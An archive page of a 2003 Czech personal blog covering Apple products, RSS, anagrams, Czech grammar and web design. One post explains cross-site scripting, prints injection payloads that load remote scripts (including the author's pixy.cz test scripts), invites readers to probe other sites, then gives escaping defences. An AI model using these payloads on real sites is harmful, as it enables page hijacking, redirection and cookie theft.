TOPlist

Pixylophone - archiv

Úterý, 29. duben 2003

Webdesign
19.41

Proč jsem přestal mít rád pooh.cz

Na pooh.cz už chodím jen sporadicky. Na základě nadpisu a popisu si otevřu tak jeden článek z dvaceti, a z těch mně zaujme tak s bídou každý pátý.

Zkusil jsem se zamyslet na tím, co mi na Poohovi vlastně vadí:

  • během pár měsíců se změnil z blogu v normální ezin se všemi náležitostmi (kvantita článků, "klikněte na pokračování", diskuse, velké množství autorů, reklamy)
  • ztratil ksicht. Dnes tu najdete články úplně o čemkoli, v různých stylech (podle toho, kdo z desítek přispěvatelů je autorem)
  • kvantita zvítězila nad kvalitou. Denně až padesát článků (mám pocit) je k ničemu.
  • každý druhý článek je o jakémsi hokeji (nebo co to je), který mě absolutně nezajímá

Přistihl jsem se, že stále raději chodím na malé, i méně známé blogy, jejichž autor má jasný styl, rukopis, a když o něčem píše, tak tuším proč a jak.

Z Pooha se zvolna stává druhý SvětNamodro, na který jsem přestal zcela chodit už velmi dávno. R. I. P.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (38)


Apple
09.50

Jabka ještě multimediálnejší

Drby se potvrdily, nové multimediální aktivity Apple jsou tady.

Na včerejšek byl ohlášen satelitní přenos CEO Apple Steva Jobbse, kde měl ohlásit některé hardwarové novinky. Hodně se o nich spekulovalo, nakonec se potvrdily už starší předpoklady o větším prolnutí Apple na multimediální trh.

Co je tedy nového? Hned tři věci: iTunes, QuickTime a nové iPody.

iTunes 4.0

Hlavní změnou je integrace MusicStore. Nenápadně, jako jeden z plalistů (zelený) se tváří seznam ukázek (30s, high-quality), písničky nebo celá alba si můžete rovnou koupit ($0.99/skladba, $9.99/CD). Vlastně — koupit si to nemůžete, pokud nežijete v USA. Viz též dnešní petice.

Škoda, Music Store startuje s 200.000 skladeb. Ano, takhle nějak vidím funkční obchodní model fonografického průmyslu.

Z dalších novinek: podpora formátu AAC (vyšší komprese než MP3, vyžaduje nový QuickTime 6.2), sdílení playlistů přes Rendezvous, možnost přidávání obrázků (např. obalů CD), vypalování hudby na DVD, lepší vyhledávání...

Download iTunes via Apple (8,3 MB).

QuickTime 6.2

Prakticky jediná změna: podpora enkodování/dekódování ve formátu AAC. Využijete ho asi jen s novými iTunes a novými iPody (moc dalších přehrávačů ho nepodporuje — i když jsou takové).

Download QuickTime via Apple (18,4 MB).

iPody

Nové tenčí (15,75 mm) a lehčí (160 g) modely, s kapacitou 10, 15 a 30 GB. K otočnému ovladači přibyla čtyři tlačítka (škoda :( ), nově dostanete k iPodu také dock (jen k 15 a 30GB modelům, umožňuje synchronizaci, dobíjení a připojení k domácímu stereo systému). Software iPodů nyní obsahuje také několik her, čtečku poznámek, hodiny/budík a přehrává zmíněné AAC soubory... A nic se nezměnilo na tom, že iPody jsou pro Mac i Windows.

Je to krása, slintám — ale $299-$499 (na české ceny s kurzem 1:50 radši ani nemyslím) za MP3 přehrávač je pro mě cu moc... :( Ale zase 30 GB... Zatím mám MP3 necelých 12 GB (a to jsem ještě nestihl převést do MP3 všechna CD) — představa kompletní fonotéky v jediné mašince se mi MOC líbí...

Více informací a obrázky: apple.com/ipod.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (1)


Apple
09.40

Další petice Velkému Bratrovi

Nejsem sám, kdo pořádá petice. Je tu suplika směřovaná společnosti Apple nespokojenými zahraničními uživateli.

K jejímu textu by asi český uživatel doplnil přinejmenším deset dalších odstavců, ale i tak tato petice stojí aspoň za přečtení. Týká se především aktualizovaných iTunes (o nich v dalším příspěvku).

Vložil Petr Staníček - Trvalý odkaz - Komentáře (0)


Pondělí, 28. duben 2003

Webdesign
19.55

Nenápadný přechod z WWW na RSS

Málem jsem to ani nepostřehl, ale jistou dobu mi RSS zvolna začíná nahrazovat web.

Kdybych si nevzpomněl, že už jsem nějak dlouho neviděl Michálkův web, kdo ví, jak dlouho by mi to ještě unikalo. Ještě celkem nedávno jsem přinejmenším jednou denně (u ranního kafe) sedl k nějaké stránce s odkazy (bookmarky bůhvíproč nemám rád) a prokombajnoval své oblíbené magazíny a blogy. Pak jsem čím dál častěji chodil na RSSSky, později na blogportál a na náhledech článků už dělal předběžnou selekci. Ale pořád to nebylo ono (třeba na Blogportálu mám pořád výchozí nastavení, moje předvolby si to ne a ne zapamatovat).

Nakonec jsem oprášil kdysi k ledu odložený NetNewsWire (když jsem ho zkoušel, mělo vlastní RSS ještě žalostně málo blogů). A najednou, když už je RSS na výběr dostatek (až na pár výjimek, které mně celkem štvou 1, 2, 3), začínám den spuštěním RSS vieweru, načtením 36 oblíbených RSS souborů a jejich čtením... Jen když mně něco opravdu zaujme, kliknu a načtu si celý příspěvek v browseru.

A co mně překvapilo nejvíc, tak nějak si najednou počtu víc a líp. Jen je škoda těch několika zpátečníků :) — takhle si na jejich stránky vzpomenu třeba jen dvakrát třikrát za měsíc. Pokud vůbec...

Bohužel, budoucí vývoj už nevidím zas tak růžově:

  1. RSS? Co to je?
  2. Jojo, už jsem o tom slyšel (teď jsme někde tady...)
  3. Máme, heč (... nebo tady)
  4. ...
  5. Tý vole, ty lidi nám vůbec nechodí na houmpejč
  6. Týýýý vole, reklamka chce zrušit smlouvu

A dále už se liší možné vývojové větve:

  • RSS? To už jsme zrušili...

nebo

  • RSS? To už jsme zrušili...
  • (týýý vole, lidi nám furt nechodí na houmpejč. Voni se nechodí vůbec)

á nebo

  • Hele, dá se do toho RSSka strčit banner 125x125?
  • Hele, dá se do toho RSSka strčit banner 630x480?
  • Kdo zase strčil do toho RSS kus textu článku???!

Vložil Petr Staníček - Trvalý odkaz - Komentáře (12)


Pátek, 25. duben 2003

Jen tak
10.17

Jarní oslepení

Dnešní pohled z okna, to bylo vážně něco.

Milión sluncí
Z předvčírem černých větví
Prýští zlatý déšť

Další duševní exkrementy mám na zvláštní stránce...

Vložil Petr Staníček - Trvalý odkaz - Komentáře (4)


Webdesign
08.38

Blogy a návštěvnost

Je fér si uměle navyšovat údaje o návštěvnosti vlastního blogu?

Když jsem se po dlouhé době podíval na výpis blogů na Toplistu, děsně mě překvapil skok-o-tyči na čelo seznamu: hlava.net. Že by hambaté obrázky tak táhly? Tedy, to jistě — ale že tolik? A pak mě něco napadlo: a taky že jo. Eda Hlava má kód Toplistu (a Navrcholu) i na stránkách RSS agregátoru blogportál, a to se stejným ID jako na svém blogu (ID=44367).

Ještě že mi je moje návštěvnost celkem ukradená — ale přijde mi to hodně nefér vůči ostatním blogerům, kteří svou návštěvnost třeba pečlivě sledují... :( Taky bych mohl do blogu připočítávat všechny stránky na pixy.cz, ne jen ty v adresáři /blogg — ale nějak v tom nevidím žádný smysl.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (11)


Středa, 23. duben 2003

Webdesign
14.20

Nový bookmarklet: Vypočítané styly podruhé

Je tu nový bookmarklet, který dynamicky zobrazuje aktuální hodnoty libovolné vlastnosti CSS pro všechny prvky na stránce, na které ukážete.

Původní bookmarklet (favelet) na zobrazení vypočítaných (kaskádovaných) stylů byl trochu nepraktický, když zobrazoval pouze vybrané vlastnosti, zato od všech prvků na stránce současně.

Vytvořil jsem proto zbrusu nový skript, který zobrazuje jakoukoli zvolenou vlastnost pro všechny prky pod kurzorem (upozornění: skript si přisvojí všechny události onmouseover a onmouseout na stránce). Nefunguje v IE5/Win (netuším proč), ani v Opeře či Safari (bohužel). Testoval jsem jej ale v IE6/Win, IE5/Mac a Mozille a tam je to OK.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (4)


Jen tak
09.52

Ad Programátorští kouzelníci

Rychlé řešení problému nejkratší cesty na hexagonu se složitostí O(1).

Chtěl bych moc poděkovat blogu the Wild Mud za příspěvek Programátorští kouzelníci. Normálně takovéto weby nenavštěvuju, takže mi podobné lahůdky zcela unikají.

Na druhě straně musím říct, že úplně stejně jako Neologismovi mi popsaný problém hned na první pohled připadal, že řešení řádu O(n) je zbytečné a procházet všechna pole je nesmysl. A navíc (na rozdíl od Neologisma) si myslím, že i O(log(n)) je zbytečnost. Prostě se to dá vyřešit v konstatním čase (resp. nanejvýš v čase závislém na délce výsledné cesty).

Jak říkám, takovéhle chutné problémky mi vesměs unikají, takže když už jsem něco podobného potkal, s chutí jsem se do toho zakousnul (závity potřebujou pravidelně promazávat). A skutečně to tak funguje. Funkční řešení jsem vyrobil v Javascriptu. I pro pole s čísly (řekněme) 1.234.567.890 a 9.876.543.210 to je docela svižné — zdržuje pouze vypsání 77 tisíc polí tvořících spojnici; kdybych zobrazoval jen počet, je to na mrknutí oka.

Jó, kdyby pánové chtěli vypsat všechny možné nejkratší cesty, tak to už je opravdu složitější problém neeuklidovské geometrie... Takhle bude neeuklidovský jen důkaz, že je tenhle algoritmus opravdu korektní (tj, že nalezená cesta je skutečně neeuklidovskou přímkou). A mám pocit, že důkaz by to byl docela drsný...

Update 2003-23-04,15:06 Doplnil jsem druhý skript, který jen vypíše počet polí a nezobrazuje je — to hlavně, aby si ghost mohl hrát i v řádu tisíců milard :)

P.S.: S tím "mrknutím oka" jsem to přehnal — pro A=1.000.000.000.000 a B=2.000.000.000.000 trvá výpočet 58 sekund.

Update 2003-24-04,13:30 Takže opravdu to jde O(1) (výpočet v konstatním čase, pod 1 ms). Předělal jsem druhý skript úplně jinak a už se nic neprochází. Popis algoritmu je tam taky. :D

Vložil Petr Staníček - Trvalý odkaz - Komentáře (4)


Pondělí, 21. duben 2003

Čeština
18.47

Osiřelý imperativ

Dodnes jsem vůbec netušil, že v češtině existuje sloveso, které má jen rozkazovací způsob. Jen samotný imperativ, nic víc: jiný tvar nejde ani vytvořit.

"To máte imperativy, že je v životě neuslyšíte," tak nějak to říká Werich v jedné ze svých forbín. Takové hněť, kraď, smrď — kdy se s tím člověk potká, to je pravda...

Na druhé straně jsem ale dneska narazil na jeden imperativ, chudáčka osiřelého, ke kterému neexistují ostatní tvary, o infinitivu nemluvě. Které že sloveso to je? Běžné, denně používané: pojď (pojďte, pojďme). To je přece imperativ an sich, žádný jiný tvar to slovo nemá. Nebo snad má? Od jít ani pojít to odvozené není (jdi/pojdi).

Jak jsme k pojď přišli, jak vzniklo? Jediné, co mě napadá, je vývoj: přijít -> přijdi -> zkrácený tvar přijď -> analogie pojď. Nebo to bylo jinak?

A existují v češtině další taková singulární slova? Pokud o nich víte, dejte je k dobrému v komentářích.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (23)


Pátek, 18. duben 2003

Čeština
16.37

STRPENÍ ČEKAT

Po dlouhé době jsem oprášil již málem zapomenutou adresu se zábavou na dlouhé večery.

A že vyhledávač přesmyček je dobrá zábava. S českými nabodeníčky máme sice oproti angličtině jistou nevýhodu, ale vyhledávač je odstraňuje a pracuje jen s písmeny bez hacku a carek. Díky tomu vznikají neskutečné perly. Zde ukázka nejlepších:

     CESKA POLICIE : SILACKE OPICE
   ALBERT EINSTEIN : ELITNI ABSENTER
   MONIKA PAJEROVA : OPOMIJENA KRAVA
     OTAKAR MOTEJL : MAJOR TELATKO
   PAVEL RYCHETSKY : CHYSTA PREVLEKY
      VLADO MECIAR : DRAMA VOLICE
     ILONA CSAKOVA : NASAVA COKOLI
      ALES VALENTA : VASEN LETALA
        LEOS MARES : SERE MASLO
      DANIEL HULKA : HLEDI K ANALU
     KAREL BREZINA : ERARNI ZLABEK
      PATRIK ZANDL : PRD ZLATNIKA
      MILOS CERMAK : MOCIS KARLEM
    DANIEL DOCEKAL : NEDALEKO CIDLA
     IVO LUKACOVIC : AU CLOVICKOVI
   ANTONIN HERBECK : BAHENNI KONCERT
   NEVIDITELNY PES : NEVYLEPSIT DENI
     BRITSKE LISTY : SKRTILI BYSTE

A protože každého pochopitelně nejvíc zajímá vlastní jméno, nacpal jsem tam taky PETR STANICEK. Z výsledných 650 přesmyček vybírám:

STEAK PRICTEN. PRINEST, CEKAT. APETIT SKRCEN.

TATICEK SRPEN: PATETICKE SNR, TRESTNI CAPEK. STRANIK? PECTE! NEPATRITE KSC. KRICTE: STEPAN!

NEPSAT-KRICET! STATNIK PRECE SPATNE KRICET. SPAT, NEKRICTE!

PTACNIK SETRE STATEK PRINCE. CERTIK STEPAN KRATCE SPITNE: KRCITE SPENAT, TRPKA STENICE! TRAPIT CESNEK...

TAKE PRSTENCI PTAK NESETRIC NECTE SKRIPTA. PRECTE SI KANT. PATECNI KREST: CTENI SPEKTRA. TACEK STREPIN, TRCET PESINKA.

SKRT PACIENTE: NACRTEK PESTI, PRECIST TKANE, PESTI NAKRCITE. SPATNE KRCITE: SKRCTE NAPETI, SKRCTE PENTIA!

STACET PERNIK? TRESTNI PECKA.

STANEK PRECTI, NACTI RESPEKT: PARENISTE CTK, TRCI STEPANEK. TISK PRECTEN A TRESTAN CIPEK.

STETKA PRICNE (ENTITA SPRCEK), STRIPEK TANCE, SPETKA TRCENI. TRIK STEPANCE, PRSTEN I KATCE. STRET PANICEK. ASPEKT TRENIC PRICTE SNATEK. TRPKA SECTENI.


PICA SKRTNETE, AKCENT PRISTE.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (3)


Jen tak
12.04

Jaro dorazilo

Jak vidno. Nevidno? Zkuste jiný styl.

Update 2003-04-24: Je po velikonocích, dost bylo agresivní zeleně a králíků s mašlí. Zpět do fádních barev.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (6)


Lampárna
01.17

Lidová opičárna v centru

Lidovky se spojily s Centrem. Všichni odborníci skončili na dlažbě a nový design vytvořil synovec uklízečky.

Jinak si to ani neumím vysvětlit...

Ale což, netřeba hlubokých komentářů. Web je graficky neotřelý a precizně zarovnaný, dokonce již počítá se širokoúhlými monitory. Autoři si dali práci hned s několika uvítacími zprávami na každé straně. Typografie je dotažená k nejzazšímu kraji. Kód stránek laik nepochopí, odborník užasne. Autor totiž zvolil velmi inovativní cestu destrukturální syntaxe (více viz celý zdrojový kód).

Lidovky také podporují moderní technologie: kdyby se všechny weby načítaly takhle pomalu, lidé by jistě začali více nahrazovat své staré modemy vysokorychlostními přípojkami... A kdyby samotný obsah stránky byl příliš malý, autoři mají v záloze další pojistky. Například CSS je dobrý nástroj: jenom defince font-family: Arial, Geneva, Arial, Helvetica, sans-serif se zde vyskytuje sedmačtyřicetkrát. A ještě je tam rezerva.

Bohužel, jakkoli je nový web Lidovek progresivní a inovativní, jsem já zase příliš konzervativní a tuto povedenou taškařici přenechám mladší (a odolnějším) uživatelům. Baj baj.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (6)


Středa, 16. duben 2003

Apple
10.33

Drbání pantera

S blížícím se uvedením MacOSX 10.3 (kód Panther) se množí i spekulace o možných novinkách. Budou hromádky, multilogin? A co bezdrátové dotykové displeje?

Drby kolem Pantera houstnou. Mluví se hlavně o dvou věcech: o "hromádkách" a vícenásobném loginu. Sice ani o jednom se neví najisto, že v Pantheru bude, ale rozhodně by to bylo pěkné.

Hromádky

Jedna paní povídala, že by se zde mohla objevit implementace technologie piles (pile je česky nejspíš hromádka, štos, "komínek"), jejíž patent vlastní Apple již delší dobu. Jedná se o jiný druh seskupování dokumentů, než jsou současné složky/adresáře. Uživatel vidí hromádku dokumentů naházených na sebe, po kliknutí na hromádku se vedle zobrazí náhled (a další informace) a pohybem myši v hromádce listuje; po nalezení vhodného dokumentu pustíte tlačítko myši a dokument se otevře. Výška hromádky odpovídá počtu dokumentů v ní.

Pokud tohle v Panteru bude, dá se navíc s jistotou očekávat exceletní grafické zpracování a příjemné ovládání — jinak to v Aquě ani být nemůže. Mohlo by to být těžce návykové.

Multilogin

Doposud se lze do OSX (jako do každého jiného UNIXu) přihlásit hned několikrát, ale pouze na textové konzoli (v terminálu). Grafický login je unikátní. Mluví se o tom, že Panter by mohl nabízet konečně i vícenásobný grafický login. To znamená, že současně s jedním přihlášeným uživatelem se mohou nezávisle přilogovat i další uživatelé — aniž by byly ovlivněny běžící aplikace a nastavení uživatele stávajícího (znáte jistě z Windows XP :) ).

Hodně se to dává do souvislosti s pověstmi o přenosných dotykových displejích — ty by fungovaly jako bezdrátový grafický terminál (žádný disk) stolního počítače a vícenásobný login je pro takováto zařízení jistě důležitým předpokladem. To je ale opravdu ve stádiu báchorek a bajek (tzv. Ezop-state), nemyslím si, že by Apple s něčím takovým přišel ještě letos (i když možná... oblíbená Jobsova překvapeníčka na závěr při keynote na AppleExpo...)

Osobně se ale na vícenásobný login třesu jako kuře na sopel i bez jakýchkoli externích zařízení. Většině uživatelů to ani nepřijde (často mají dokonce multiuser vypnutý) — jste-li ale na jeden počítač dva (a více), je to o něčem jiném... Když mám cokoli rozdělaného a přijde žena, že si potřebuje přečíst/napsat mail, tak procedura logout-login-logout-login je na zabití. Nemluvě o paralelním přihlášení jako root (pardon, Admin)... Pokud by to fungovalo, mohl by tím být rázem vyřešený i problém více desktopů — stačí, abych se mohl přihlásit pod svým účtem několikrát (viz XWindow).

Jestli to vyjde, budu nejspokojenější uživatel počítače na světě, protože jestli mi v Jagu něco chybí, tak právě tohle.

A kdyby si v Applu dali záležet na pořádné podpoře pro CE-lokalizace, bylo by to úplně ideální. Ale to už spíš věřím na ty přenosné displeje.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (2)


Úterý, 15. duben 2003

Webdesign
18.02

Dekonstrukce na webových stránkách

Hrozí vašemu webu dekonstrukce zvenčí? Pokud ano, zabránit tomu lze poměrně snadno.

Když jsem nedávno přidával do svých blogů komentáře, hned několik lidí mně s velkou chutí upozornilo na chyby umožňující dekonstrukci. Hned jsem se to vynasnažil upravit, ale protože se jedná o chybu velmi oblíbenou, častou a přitom v některých případech dokonce celkem nebezpečnou, řekl jsem si, že by to mohlo zajímat i ostatní.

S pojmem dekonstrukce úzce souvisí i další: cross site scripting. Oč se jedná ve druhém případě, podrobně vysvětluje Pooh. Dekonstrukce je pak na jedné straně podmnožinou cross-site skriptování, na druhé straně i jeho rozšířením — záleží, jak se na to díváte.

Oč jde? Obecně lze říci, že dekonstrukcí se rozumí změna obsahu webu zvenčí bez vědomí jeho provozovatele, čistě prostředky běžného prohlížeče a bez nutnosti přístupu ke zdrojovým souborům. V zásadě je dvojí: dekonstrukce URL a trvalá dekonstrukce stránek. Princip je ale stále stejný: využívá chyby autorů dynamicky generovaných stránek, jejichž program (např. PHP či ASP) bez důkladného ošetření zapíše do obsahu stránky zvenčí zadaný text. Pokud tento text obsahuje vhodné značky HTML, může tak kdokoli podsunout do stránky svůj kód dle libosti. Pokud bude obsahovat viditelný text, může zcela změnit obsah stránky; pokud bude obsahovat javaskript, bude mít "vetřelec" přístup ke stránce stejně jako její autor a může s ní dělat už úplně cokoli — číst/zapisovat cookies, přesměrovat stránku na jinou adresu (třeba na konkureční web s identickým vzhledem), vložit nepravdivé informace ("Firma XYZ zanikla. Navštivte místo toho firmu ABC") atd.

Příklad:

Na stránce je vyhledávací formulář s polem text, do nějž se vkládá hledaný text. Po odeslání je vrácena stránka, na jejímž začátku je zapsáno "Výsledky hledání slova: váš_text". Což v kódu stránky obvykle vypadaná např. takto:

<p>Výsledky hledání slova: váš_text ...

V tomto případě je evidentní, co nastane, pokud dekonstrukce nebude ošetřena a hledaným textem bude např. <script src="http://mujweb.cz/mujskript.js"></script> — ve stránce bude zapsáno:

<p>Výsledky hledání slova: <script src="http://mujweb.cz/mujskript.js"></script> ...

což při načítání stránky způsobí, že se vložený skript spustí, s plnými právy přístupu k dokumentu a oknu. Není ani problém, když vyhledávaný text není vložen jako text, ale jako obsah formulářového pole:

<input type="text" name="text" value="váš_text">

Potom stačí začít vhodnými znaky, např. vložit:

"><script src="http://mujweb.cz/mujskript.js"></script>

Pokud na webu není dekonstrukce ošetřena, ve stránce bude toto:

<input type="text" name="text" value=""><script src="http://mujweb.cz/mujskript.js"></script> ...

Trvalá dekonstrukce

Používá se tehdy, když stránka umožňuje uložit nějaký obsah natrvalo, nejčastěji právě v komentářích a diskusích. Cross-site skript se vloží do jednoho z polí při zadávání nového příspěvku (nejen do těla, ale např. do pole e-mail). Pokud se vložený hack dobře přizpůsobí formátování cílové stránky, může dokonce zůstat nenápadně a nezpozorován po celou dobu.

Častější je ale:

Dekonstrukce URL

Využívá se toho, že formuláře odesílají vložená data jako parametry v adrese (URL) cílového skriptu (metoda GET ve formulářích). Zadání takovéto adresy do prohlížeče pak vrátí stejnou stránku, jako kdybychom zadali text do formuláře a stiskli odeslat. Pakliže se takovéto URL umístí někam na stránky, vypadá na první pohled jako běžná adresa cílového webu a navíc je to adresa zcela korektní (od "slušných" adres se liší jen dodatečnými parametry na konci). Uživatel klikající na odkaz vidí adresu cílového webu, který se mu dokonce začně načítat — přitom je ale výsledná stránka pod kontrolou cizího skriptu. Pár příkladů (je možné, že časem bude na těchto webech dekonstrukce opravena, takže nic neobvyklého neuvidíte):

Anebo takto (pozor na závrať): Atlas.cz, případně ještě jinak: Eurotel.cz

Kdo má zájem testovat další weby, může použít následující cross-site skripty:

  • <script src='http://pixy.cz/dc/dc.js'></script> — vloží do cílové stránky červenou upozorňující stránku
  • <script src='http://pixy.cz/dc/dc-redir.js'></script> — přesměruje stránku na jinou adresu
  • <script src='http://pixy.cz/dc/dc-shake.js'></script> — viz Atlas.cz výše.

Obrana

Jak je vidět, dekonstrukce nemusí být pro majitele stránek zrovna sranda (především ta trvalá). Bránit se proti ní je přitom celkem jednoduché a velmi spolehlivé.

V prvé řadě: všechny texty pocházející od uživatelů, ale i ty, které lze předat v URL, zapisovat do stránky přes filtr zaměňující minimálně znaky < a > za &lt; a &gt;. V PHP k tomu slouží funkce htmlspecialchars(), která nahradí navíc i uvozovky entitou &quot;.

Další pojistky: rozhodně nedovolit uživatelům vkládat komentáře v HTML. Používat ve formulářích jen metodu POST a nepřijímat hodnoty poslané přes GET (není to úplně spolehlivé, ale jistější). Není-li to nutné, data od uživatelů do stránek vůbec nezapisovat.

Skoro nic to nestojí — jak je ale vidět, i velké servery mají s dekonstrukcí stále problémy.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (22)


Webdesign
10.55

Ad Webová reklama

Na Sově se zmiňují výsledky soutěže Louskáček o nejlepší webovou reklamu. Loni jsem byl členem poroty takovéhle soutěže a od té doby mám nejen o webové reklamě, ale i o jejích tvůrcích a především jejích posuzovatelích v soutěžích své mínění...

Drtivá většina soutěžních reklam tehdy spočívala v nějaké aplikaci (většinou zábavné hře), která probíhala přímo v okně s bannerem (nebo přímo v banneru). Ale až poté, co uživatel na reklamu kliknul. Podle výsledků posuzovalo 90 % porotců nápady a kvalitu provedení právě těchhle her a hříček. Já se ale nějak nemohl zbavit pocitu, že u uživatelů, znechucených hlavně stovkami falešných bannerů (klikni na tři banány, chyť opičku a vyhraješ), tohle nemůže fungovat. Pokud někoho reklama zaujme, tak v prvé řadě tím, jak působí na stránce bez jakékoli interakce. Pokud na banner klikne (kdo nejdřív zkoumá, co se po kliknutí stane?), pak je v naprosté většině smířen s tím, že ho toto kliknutí odnese na nějaký jiný web, otevře mu novou stránku atd.

Takže jsem veškeré akce v bannerech konané až po nějaké akci uživatele (tedy pokliknutí do banneru) považoval za druhořadé a celkem nedůležité — a posuzoval je především podle prvního, tedy víceméně statického dojmu. A pohříchu, jako naprostý exot jsem taky hlasoval pro úplně jiné reklamy než všichni ostatní porotci, kteří oceňovali právě různé nápady skryté za těmito bannery. A jak říká smojlaksvěrák ve Švestce: Teď už mě tam bůhvíproč nezvou...

Pravda, většina porotců byla z reklamně-marketingové branže (vesměs ukázkoví hambajové) a od té doby si o nich myslím své ještě víc než předtím.

Marketingoví specialisté a zadavatelé internetových reklam žijí ve slonovinové věži a pohled na svět skrze excelské tabulky mají trošku deformovaný.

V praxi to pak vypadá tak, že se do reklamních bannerů vymyslí, zaplatí a provozují úžasné interaktivní, zábavné a akční hry, na nichž pracovalo 157 programátorů, 3 psychologové a pes, které používají nejmodernější technologie a uvádějí uživatele do tranzu — ale až poté, co je někdo spustí kliknutím na tlačítko klikni zde umístěné kdesi na sedmnácté stránce idnes.cz vlevo dole. Já je sice nechápu, ale není mi jich ani trochu líto.

Někteří to, pravda, už pochopili. Jenže místo toho, aby se věnovali právě tomu prvnímu dojmu a zaujali především produktem, který reklama propaguje, vrhli se na odstranění toho sekundárního problému. Takže teď už na tyhle úžasná ultrasupermultimediální díla nemusí nikdo klikat. Spustí se samy od sebe, případně si počkají až kolem projedete myší (viz XCite). Nezastavíte to, nezavřete to, zastřelili byste to.

Já to řeším jednoduše: File->Preferences->WebContent->Enable scripting->Off (to až někdo zase bude tvrdit, že prohlížeče bez Javascriptu se dnes už prakticky nevyskytují). Častěji ale zavřením okna a vyhledáním jiného webu.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (14)


Apple
09.53

Nové Safari

Nová verze prohlížeče Safari přináší výborně vymyšlený tabbed-browsing a mnoho opravených chyb.

Na webu Apple je k dispozici druhá veřejná beta verze Safari (Public Beta 2, v71). Vylepšení mezi jednotlivými verzemi jde opravdu mílovými kroky — zatímco předchozí verze měla ještě vážné problémy s některými konstrukcemi CSS a Javascript/DOM (viz např. blesk.cz, reflex.cz), množství bugů bylo opraveno a nyní jsou již i tyto stránky použitelné. Ještě zůstávají např. chyby v implementaci crop a overflow (reflex.cz) a spousta dalších, ale ty nejmarkatnější — především vážný problém s float (viz blesk.cz) — jsou opraveny.

Blesk.cz v novém Safari

Z novinek stojí za zmínku hlavně automatické vyplňování formulářů a přístupových hesel (včetně možnosti rychlého resetu citlivých uživatelských nastavení), import bookmarků z Mozilly a další podpora Applescriptu. A především záložky (tabbed browsing).

Ze Safari přímo sálá snaha udělat co nejjednodušší a maximálně přítulný prohlížeč. Rozhraní působí velmi jednoduše, předvolby jsou stručné a přehledné, uživatel není obtěžován desítkami ikonek a stovkami funkcí v menu — plná funkčnost však je stále zachována. Všechno, co jde, je totiž skryto za fasádou a pod kapotou. Když ale uživatel potřebuje, má důležité funkce po ruce — pokud možno co nejjednodušeji a nejintuitivněji.

Za všechny příklad s již zmíněnými záložkami. Pokud si v předvolbách zaškrtnu používání záložek, na každém odkazu (nebo tlačítku) mám hned několik možností. Kliknutí otevře odkaz jako obvykle ve stejném okně. Ale další možnosti jsou nenápadně po ruce. Cmd-klik otevře odkaz v nové záložce pod aktivním dokumentem (můžu si tedy naklikat hned několik odkazů, které se začnou načítat na pozadí, aniž bych opustil stránku, na níž se právě pohybuji). Cmd-Shift-klik otevře dokument v nové záložce na popředí, Cmd-Alt-klik v novém okně na pozadí a Cmd-Alt-Shift-klik v novém okně na popředí. Pokud záložky v předvolbách vypnu, ovládání se změní (Cmd-klik je nové okno, Cmd-Shift nové okno na pozadí) — velmi intuitivně, právě tak, jak to nejčastěji používám. A nejpříjemnější na tom je, že žádnou ze zkratek si nejsem nucen pamatovat: po stisknutí kterékoli kombinace modifikačních kláves se informace o výsledné akci zobrazí v stavovém řádku (např. Open "http://..." in new tab behind the current one). Příjemné, jednoduché, intuituvní — zvlášť když mám Cmd-klik namapovaný na klik kolečkem myši.

Ještě dořešit pár bugů (např. chybu javascriptu bránící v plném používání eBanky), opravit zpracování atributů title (zobrazovat popisky přímo v okně a ne jen ve stavovém řádku)... Safari se pak asi velmi rychle stane mým primárním prohlížečem (už teď po něm sahám čím dál častěji) — kvůli permanentní tvorbě nějakých stránek ale si stále držím (čím dál nenáviděnější) MSIE: pak už bych ho mohl mít jen jako doplněk pro ladění... Vážně už se na Safari těším.

Vložil Petr Staníček - Trvalý odkaz - Komentáře (1)


Sobota, 12. duben 2003

Webdesign
20.25

Webdesignerský mekdonald

Uniformita, přeslazený polystyren i klasický frenchizing — to vše se dá najít za projektem design.stranek.cz

Web design.stranek.cz nabízí velký soubor hotových designů webových stránek, rozdělených do 50 kategorií podle zaměření výsledného webu. Jejich cena se většinou pohybuje mezi 35 a 55 dolary (cca 1000 až 1700 Kč) a zákazník za ni získá HTML stránku(y) s připojenými obrázky, grafický návrh ve Photoshopu a sadu použitých fontů.

Což o to, to by bylo OK — proti gustu žádný dišputát: když se chce někdo na veřejnosti prezentovat předžvýkanými prefabrikáty, má na to právo. Jen jsem příliš nepochopil, kdo by si vlastně tyhle šablony mohl chtít koupit. Jejich design je totiž příliš výrazný a přísně účelový (obecné a neutrální šablony se zde moc nevyskytují) na to, aby si nějaká firma mohla dovolit riskovat, že s úplně stejným designem se zanedlouho v sousedství objeví i jejich konkurence. A pro studentíky, malé firmičky nebo podobné nenáročné uživatele, kterým by podobná neexkluzivita zase tolik nevadila, jsou zase až příliš drahé.

Další otázkou je kvalita předloh. Potenciální zákazník by měl mít na paměti, že si zde kupuje především grafický návrh. Jeho zpracování (tj. převod výtvarného nápadu do prostředků webu) je už celkem pofiderní a pro smysluplné použití vyžaduje přinejmenším další laborování v nějakém wysiwyg editoru, raději však kompletní přepracování do nějakého rozumného kódu. Kód stránky, kterou zde získáte, je totiž vytvořen rozřezáním grafického návrhu do tabulek a výsledkem je navíc klasický nestandardní kód plný chyb, který se dělal kdysi před pěti lety (třeba v Cyberstudiu blahé paměti).

Otázkou je také, zda jsou součástí šablony (a jak vypadají) potřebné javascripty — na úvodní stránce se sice uvádí, že u HTML je již implementováno Mouseover na tlačítkách (žádné iluze, stránky jsou plné obrázkových rolloverů) — v ukázkové šabloně, kterou si tam můžete zdarma stáhnout, však chybí jak tyto rollovery, tak i alespoň kousek javascriptového kódu.

Pěkným faux pas je skutečnost, že všechny dodané soubory a adresáře jsou pojmenovány velkými písmeny, zatímco v šablonách se odkazují písmeny malými (např. obrázek IMG/LOGO.jpg se odkazuje jako src="img/logo.jpg". Což třeba při editaci stránky ve Windows nebude vadit, ale po jejím umístění na unixový/linuxový server se chudák zákazník nebude stačit divit.

